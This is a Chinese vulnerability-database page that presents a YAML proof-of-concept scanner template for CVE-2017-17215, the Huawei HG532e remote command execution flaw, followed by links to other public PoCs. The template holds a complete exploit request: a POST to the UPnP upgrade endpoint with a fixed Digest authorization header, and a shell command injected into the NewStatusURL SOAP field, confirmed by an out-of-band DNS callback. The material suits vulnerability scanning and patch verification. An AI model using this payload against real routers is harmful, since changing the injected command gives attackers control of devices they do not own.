CVE-2017-17215: 华为HG532e远程命令执行漏洞

漏洞描述

PoC代码[已公开]

id: CVE-2017-17215

info:
  name: 华为HG532e远程命令执行漏洞
  author: zan8in
  severity: critical
  verified: false
  description: 华为HG532e路由器存在远程命令执行漏洞，攻击者通过漏洞可以获取服务器权限
  tags: huawei,rce
  created: 2025/02/14

set:
  oob: oob()
  oobDNS: oob.DNS()
rules:
  r0:
    request:
      method: POST
      path: /ctrlt/DeviceUpgrade_1
      headers:
        Authorization: "Digest username=dslf-config, realm=HuaweiHomeGateway, nonce=88645cefb1f9ede0e336e3569d75ee30, uri=/ctrlt/DeviceUpgrade_1, response=3612f843a42db38f48f59d2a3597e19c, algorithm=MD5, qop=auth, nc=00000001, cnonce=248d1a2560100669"
      body: |
        <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>;/bin/busybox ping {{oobDNS}};</NewStatusURL><NewDownloadURL>HUAWEIUPNP</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()

相关漏洞推荐

• CVE-2017-1000028: GlassFish LFI POC

  2025-09-01 | GlassFish
  GlassFish是一款强健的商业兼容应用服务器，达到产品级质量，可免费用于开发、部署和重新分发。开发者可以免费获得源代码，还可以对代码进行更改。GlassFish漏洞成因:java语义中会把&quo...

• CVE-2017-1000486: Primetek Primefaces 5.x - Remote Code Execution POC

  2025-09-01 | Primetek Primefaces
  Primetek Primefaces 5.x is vulnerable to a weak encryption flaw resulting in remote code execution.

• CVE-2017-10271: WebLogic XMLDecoder 反序列化漏洞 CVE-2017-10271 POC

  2025-09-01 | WebLogic XMLDecoder
  Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WL...

• CVE-2017-11610: Supervisor RCE POC

  2025-09-01 | Supervisor
  Supervisor是一套进程控制系统，用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。...

• CVE-2017-12149: Java/Jboss Deserialization [RCE] POC

  2025-09-01 | Java Jboss
  In Jboss Application Server as shipped with Red Hat Enterprise Application Platform 5.2, it was foun...